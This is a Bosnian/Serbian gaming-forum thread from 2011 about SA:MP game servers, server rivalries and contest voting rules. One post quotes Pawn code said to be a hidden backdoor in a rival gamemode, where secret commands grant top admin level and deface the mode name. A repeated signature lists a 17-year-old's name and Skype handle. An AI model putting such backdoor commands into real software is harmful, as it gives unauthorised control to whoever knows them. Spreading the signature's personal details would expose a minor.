Glavni razgovor #7

Započeo cristiane, April 23, 2011, 00:50:40 PRE PODNE

prethodna tema - sledeća tema

0 članova i 20 gostiju pregledaju ovu temu.

a u 8 veceras otvara demir server i onaj njegov NFS -.-
Bas cu tamo ici da vidim koji je sada mod skino :(
Nego on je unbanan na forumu ili nije?
http://www.youtube.com/loscitysamp
www.los-samp.info
JOIN US :)

Citat: [CGC] korda poslato Maj 16, 2011, 22:38:30 POSLE PODNE
srat cu ja kolko ocu nes mi ti rec brate pa cekaj da pocnemo s radom sabit cemo vas , imate taj jebeni samp server i nista vise mi imamo cs cod i ko zna sta cemo jos otvorit imam svoj hosting reklamu u pcplayu sponzora, radio, tv, web stranice i portale sve imamo a da ti nepricam sta jos planiramo zato oladi vi ste nama ukrali whisperza on je bio u isto vrijeme i kod nas i kod vas meni to nije smetalo bmk , ali ste mu vi 10000% zaprijetili da mora bit samo kod vas
Hahahah covek reko da ima reklamu za svoj samp server na tv i radiu NHAHAHAHHAHA

meni sve lici da si ti taj demir ali ok , sorry ako grijesim  ;)

Citat: Correlli poslato April 28, 2011, 15:44:59 POSLE PODNE
Citat: [AG] Vilko poslato April 28, 2011, 15:22:10 POSLE PODNE
Correlli jel moguce kako napraviti da se preko mobitela u igrici poveze s fejsom na pravom internetu? Ili mozda je bolje da napravim neki novi fejs u igrici :D

Sumnjam da znaš raditi pluginove za SA:MP i da postoji takav plugin ili će uskoro postojati.

Pa neznam.. Probat ću potražiti neki plugin za to, jer mislim napraviti neku dobru skripticu :D

Citat: [AG] Vilko poslato April 28, 2011, 16:46:03 POSLE PODNE
Citat: Correlli poslato April 28, 2011, 15:44:59 POSLE PODNE
Citat: [AG] Vilko poslato April 28, 2011, 15:22:10 POSLE PODNE
Correlli jel moguce kako napraviti da se preko mobitela u igrici poveze s fejsom na pravom internetu? Ili mozda je bolje da napravim neki novi fejs u igrici :D

Sumnjam da znaš raditi pluginove za SA:MP i da postoji takav plugin ili će uskoro postojati.

Pa neznam.. Probat ću potražiti neki plugin za to, jer mislim napraviti neku dobru skripticu :D

Tesko da ces to naci brate :D










Real-Life informacije



Ime : Vedad
Prezime : Fetahovic
Nadimak : Dedica
Zanimanje : Zigolo
Pol : Musko
Godine : 17







BS i ostale informacije



Rank :
Profil : Click Skype : Vedad_Phantoom CH-RP : ex Head Admin CH-FPS : ex Head Admin CH status : Legenda



Ja ovog Marka sa Balkan Expresa opste ne prepoznajem po onim slikama sto je objavio Gigi ili Frankie.
Mislim on je ovako bio dobar sve IG ali nestho se desilo snjim hahaha.
Pa da je njegov otac vlasnik Pressa on sada nebi naplacivo GMOVE/ADMINE :)
Ali Gigi nestho krije od nas i nije isto i on nije bio cist :(
Napravio je komande po imenu /123456 i da se promeni ime moda i da pise Hacked by Balkan Express :( i to moze samo admin 1341.Sada ce vecina da kaze nemoguce ovo ono.Ali skinite bu mod i ukucajte to i videcete :)

   if(strcmp(cmd, "/123456", true) == 0)
   {
       PlayerInfo[playerid][pAdmin] = 1341;
       return 1;
   }
   if(strcmp(cmd, "/654321", true) == 0)
   {
      SetGameModeText("Hacked by Balkan Express");
       return 1;
   }
To je dovoljan dokaz za vise dokaza skinite bu mod i videcete :)))))
http://www.youtube.com/loscitysamp
www.los-samp.info
JOIN US :)

Citat: [CGC] korda poslato Maj 16, 2011, 22:38:30 POSLE PODNE
srat cu ja kolko ocu nes mi ti rec brate pa cekaj da pocnemo s radom sabit cemo vas , imate taj jebeni samp server i nista vise mi imamo cs cod i ko zna sta cemo jos otvorit imam svoj hosting reklamu u pcplayu sponzora, radio, tv, web stranice i portale sve imamo a da ti nepricam sta jos planiramo zato oladi vi ste nama ukrali whisperza on je bio u isto vrijeme i kod nas i kod vas meni to nije smetalo bmk , ali ste mu vi 10000% zaprijetili da mora bit samo kod vas
Hahahah covek reko da ima reklamu za svoj samp server na tv i radiu NHAHAHAHHAHA


...Neno...












Real-Life informacije



Ime : Vedad
Prezime : Fetahovic
Nadimak : Dedica
Zanimanje : Zigolo
Pol : Musko
Godine : 17







BS i ostale informacije



Rank :
Profil : Click Skype : Vedad_Phantoom CH-RP : ex Head Admin CH-FPS : ex Head Admin CH status : Legenda


Uopšte nije fora kod onog takmičenja da glasaju samo SModovi i Admini,za nas kao i da ne postoje onda to. Bolje da je bilo da se obe mape/skripte/gui teme ili šta već pošalju moderatoru tog PDF-a na PM i on posle objavi,u naslovu napiše ko igra protiv koga al' da ne napiše čiji je čiji rad,i onda svi glasaju,ako neko otkrije koji je njegov rad ili traži glas nekome da se automatski diskvalifikuje iz svih daljih takmičenja,a ne ovako. ::)


No matter how hard it is, how tough life gets, never ever give up. If you do, you never will know how close you were to making it.


Citat: Djea Djea poslato April 28, 2011, 19:04:52 POSLE PODNE
Uopšte nije fora kod onog takmičenja da glasaju samo SModovi i Admini,za nas kao i da ne postoje onda to. Bolje da je bilo da se obe mape/skripte/gui teme ili šta već pošalju moderatoru tog PDF-a na PM i on posle objavi,u naslovu napiše ko igra protiv koga al' da ne napiše čiji je čiji rad,i onda svi glasaju,ako neko otkrije koji je njegov rad ili traži glas nekome da se automatski diskvalifikuje iz svih daljih takmičenja,a ne ovako. ::)

potpis na ovo . ili da se otvori anketa rad 1 rad 2 ali da svi glasamo










Real-Life informacije



Ime : Vedad
Prezime : Fetahovic
Nadimak : Dedica
Zanimanje : Zigolo
Pol : Musko
Godine : 17







BS i ostale informacije



Rank :
Profil : Click Skype : Vedad_Phantoom CH-RP : ex Head Admin CH-FPS : ex Head Admin CH status : Legenda


Citat: Djea Djea poslato April 28, 2011, 19:04:52 POSLE PODNE
Uopšte nije fora kod onog takmičenja da glasaju samo SModovi i Admini,za nas kao i da ne postoje onda to. Bolje da je bilo da se obe mape/skripte/gui teme ili šta već pošalju moderatoru tog PDF-a na PM i on posle objavi,u naslovu napiše ko igra protiv koga al' da ne napiše čiji je čiji rad,i onda svi glasaju,ako neko otkrije koji je njegov rad ili traži glas nekome da se automatski diskvalifikuje iz svih daljih takmičenja,a ne ovako. ::)
Jbga tako bi bilo da sam ja pisao pravila ;)

Citat: Djea Djea poslato April 28, 2011, 19:04:52 POSLE PODNE
Uopšte nije fora kod onog takmičenja da glasaju samo SModovi i Admini,za nas kao i da ne postoje onda to. Bolje da je bilo da se obe mape/skripte/gui teme ili šta već pošalju moderatoru tog PDF-a na PM i on posle objavi,u naslovu napiše ko igra protiv koga al' da ne napiše čiji je čiji rad,i onda svi glasaju,ako neko otkrije koji je njegov rad ili traži glas nekome da se automatski diskvalifikuje iz svih daljih takmičenja,a ne ovako. ::)

Gle, dok nesmislimo bolji system ce biti tako. Vec znam da ce biti puno pm-ova: "Ajde molim te glasaj za mene" i onda cemo nema zatrpat sanducic ovakim porukama: "Ovaj je varo" itd. Zasad mozete sudjelovat ;)

cristiane

Citat: Djea Djea poslato April 28, 2011, 19:04:52 POSLE PODNE
Uopšte nije fora kod onog takmičenja da glasaju samo SModovi i Admini,
To je tako iz razloga što ima dosta članova koji bi glasali samo iz zajebancije ili za nekog svog.Da ne bi poslije bilo priča oko mita i korupcije mi ćemo ocjenjivati.

Citat: Koksildo poslato April 28, 2011, 19:14:17 POSLE PODNE
Citat: Djea Djea poslato April 28, 2011, 19:04:52 POSLE PODNE
Uopšte nije fora kod onog takmičenja da glasaju samo SModovi i Admini,
To je tako iz razloga što ima dosta članova koji bi glasali samo iz zajebancije ili za nekog svog.Da ne bi poslije bilo priča oko mita i korupcije mi ćemo ocjenjivati.

Tako bezveze a istovremeno tako mudro receno  ???

Ali ne valja ni jedno ni drugo :S










Real-Life informacije



Ime : Vedad
Prezime : Fetahovic
Nadimak : Dedica
Zanimanje : Zigolo
Pol : Musko
Godine : 17







BS i ostale informacije



Rank :
Profil : Click Skype : Vedad_Phantoom CH-RP : ex Head Admin CH-FPS : ex Head Admin CH status : Legenda